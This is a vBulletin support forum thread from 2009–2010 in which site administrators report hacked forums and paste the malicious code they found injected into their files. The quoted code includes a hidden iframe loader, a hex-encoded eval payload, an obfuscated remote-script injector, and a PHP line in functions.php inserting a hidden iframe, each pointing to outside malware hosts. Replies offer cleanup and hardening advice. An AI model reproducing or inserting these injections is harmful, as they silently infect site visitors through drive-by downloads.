vBulletin 3.8.4 has been hacked !!!

**renep** · Tue 18 Aug '09, 2:51am

Re-install and read: http://www.vbulletin.com/forum/showthread.php?t=194701

**mijack** · Tue 18 Aug '09, 4:19am

If I reinstall, have I to use impex? or I have to use the name of the actual data base when I'm installing

I have 85.000 users and I don't want to loose them....

Thank you

**Desibabu19** · Tue 18 Aug '09, 7:33am

sorry to hear that.
what type of mistake from admin side leads to such hack ?
Just like to learn how to prevent these attacks..

**Lynne** · Tue 18 Aug '09, 7:34am

Just reupload your backup database. You should not have to use impex for that.

**fbriceno97** · Fri 11 Sep '09, 1:11pm

Originally posted by mijack

Hello,

My website has been hacked !!!

There is a code at the end (bottom) of index.php

Code:

<script language="JavaScript" type="text/javascript">
function getfromDOM(containerid)
{var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
while(element1!==container.lastChild)
return content;
}
var ff_b = document.createElement("strong");
ff_b.id = "YuPi55";
ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
ff_b.style.visibility = "hidden";
document.getElementsByTagName("body")[0].appendChild(ff_b);
var ff_iframe = document.createElement("iframe");
ff_iframe.id = "JeT";
ff_iframe.name = "JeT";
ff_iframe.style.visibility = "hidden";
ff_iframe.src=getfromDOM("YuPi55");
document.getElementsByTagName("body")[0].appendChild(ff_iframe);
</script>

y

Code:

<iframe src="[URL="http://3cy.ru:8080/index.php"][COLOR=#0066cc]http://3cy.ru:8080/index.php[/COLOR][/URL]" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>

I don't know if other files have been hacked.

I use 3.8.4. with DownloadsII mod

Can you help me?

Thank you

my site was hacked just the same... just pointing to another server on the iframe code.

but i was using 3.8.1, so if this happen with 3.8.4 and 3.8.1 there is a hole somewhere very old letting this happen.

basically they modified all the phps,htmls files with that code.

What is the position of vbulletin about this?

**Zachery** · Fri 11 Sep '09, 2:21pm

Our position is there is no known exploit, if you have evidance of an actual exploit please report it. Likely there is a good chance that the exploit was elsewhere on the server and vBulletin was the one defaced.

**mentalrz** · Fri 11 Sep '09, 2:37pm

encoded part outputs at

Code:

document.write("<iframe src='http://000007.ru/in.cgi?7' style='display:none;'></iframe>");

just for your reference

**Steve Machol** · Fri 11 Sep '09, 5:51pm

All the the hacks I've seen like this were done through the server.

Please see this thread on how to make your vBulletin more secure:

vBulletin 6, The World's Leading Community Software

http://www.vbulletin.com/go/secure

vBulletin Community Software

If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.

**gedankenberg** · Sat 26 Dec '09, 3:54pm

Hello,

some of my vbulletin 3.8.4 patch level 1 (german) were also been hacked:

Code:

<script>/*GNU GPL*/ try{window.onload = function(){var Ju5b7bu89al = document.createElement('s#$c@@r$)i!$p)t!('.replace(/\(|@|\!|\$|#|\)|\^|&/ig, ''));var Plcsu1uj9eo04 = 'U1xil41i86oe';Ju5b7bu89al.setAttribute('type', 't&@&$e)#)x!$)t@^/!!#j!$@a((#v(a#&)s(^@c$@)r^&i(#)p&$#t)'.replace(/\!|\)|&|#|\$|\(|\^|@/ig, ''));Ju5b7bu89al.setAttribute('src',  'h!##t&t$p!@:!#/^&)/(^$o$$^v((h^(-&$n^^e@!t@(.$$h#@a#)^r#d#(#s($&)e!&^!x)!#^t&u^&@b$e!&#)^.^)!^c)))o$!m&&.@&$s#o)&n$$($#g$!s$&-$&&p##^k&$(&!.#@&t@^h&)!e!(&m^#)o&$$^b$@)i&)l@@^e@(^w^(i$(#n(!d$!o&w&.&)$r@&((u@@:)8^&0()8@@0#&()/)@!^g!)&o)(^@o@(g@^l)#$e).#&n#$#(o&(((/(g(&o#!##o$$#g&$@)!l))e$&$^(.^&n(&!&o()!@/&(#$g)&)@o)^o!#g!$$(l#$e(.$c^##$o#!^!m^)/&^!$@z)y&$)l)(((o^#^m&^!#.^#^#c@o)^m)($)/#m((-(&w$(.$c(#o!m#@$/(#^&'.replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));Ju5b7bu89al.setAttribute('defer', 'd@!)&e$(!f&(e!)^r)&!'.replace(/&|\)|#|\$|@|\^|\(|\!/ig, ''));Ju5b7bu89al.setAttribute('id', 'L!3###$d!##w(@o^@&h^(s@&(&8#@&!v$&$#u^)u&('.replace(/\!|&|\(|#|\$|\)|\^|@/ig, ''));document.body.appendChild(Ju5b7bu89al);}} catch(Pz68f7gfr80sy) {}</script>
<!--e27f528bc0f1747ea9638a535ca450f8-->

**HolyKiller** · Tue 23 Feb '10, 11:46am

When i reading this thread, my NOD32 says:

23.2.2010 21:44:09 HTTP filter archive http://www.vbulletin.com/forum/showt...ighlight=impex JS/TrojanDownloader.Agent.NRL trojan connection terminated Threat was detected upon access to web by the application: firefox.exe.

**borbole** · Tue 23 Feb '10, 12:24pm

Clean up all your forum files by overwritting them with a fresh set from the vb download package, your version. Check your server space for anything out of the ordinary. Check out all your other files if they have been infected. Change all the login info (ftp, forum admin, Cp of your host etc). And as last but not least ask your host to check their access logs so they can pinpoint the exact way how they got in and not do guess-work.

**sungerr** · Wed 24 Feb '10, 11:13am

PHP code in includes/functions.php
==================
// parse PHP include ##################
($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">   <iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
---

me 2 i got hacking by an iframe !!!!!!!!!!!!

i found it in functions.php

only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!

**borbole** · Wed 24 Feb '10, 11:28am

Originally posted by sungerr

PHP code in includes/functions.php
==================
// parse PHP include ##################
($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">   <iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
---

me 2 i got hacking by an iframe !!!!!!!!!!!!

i found it in functions.php

only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!

What version of vb do you have?

**Endlesskiss** · Wed 24 Feb '10, 12:03pm

I've been using 3.8.4 for a while and got defaced once, I suggest you to read more info about the 'Gumblar' virus (made in China, but works well), and run Avast! on your server, it's free and it works on Linux, and most likely it will find some stuff like c99.php (a Shell) on your server, which allows hackers to edit files on your server.

Basically, I've tried MANY things and none of them actually worked (No XSS nor SQLi).

vBulletin 3 End of Life

vBulletin 3.8.4 has been hacked !!!

vBulletin 3.8.4 has been hacked !!!

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment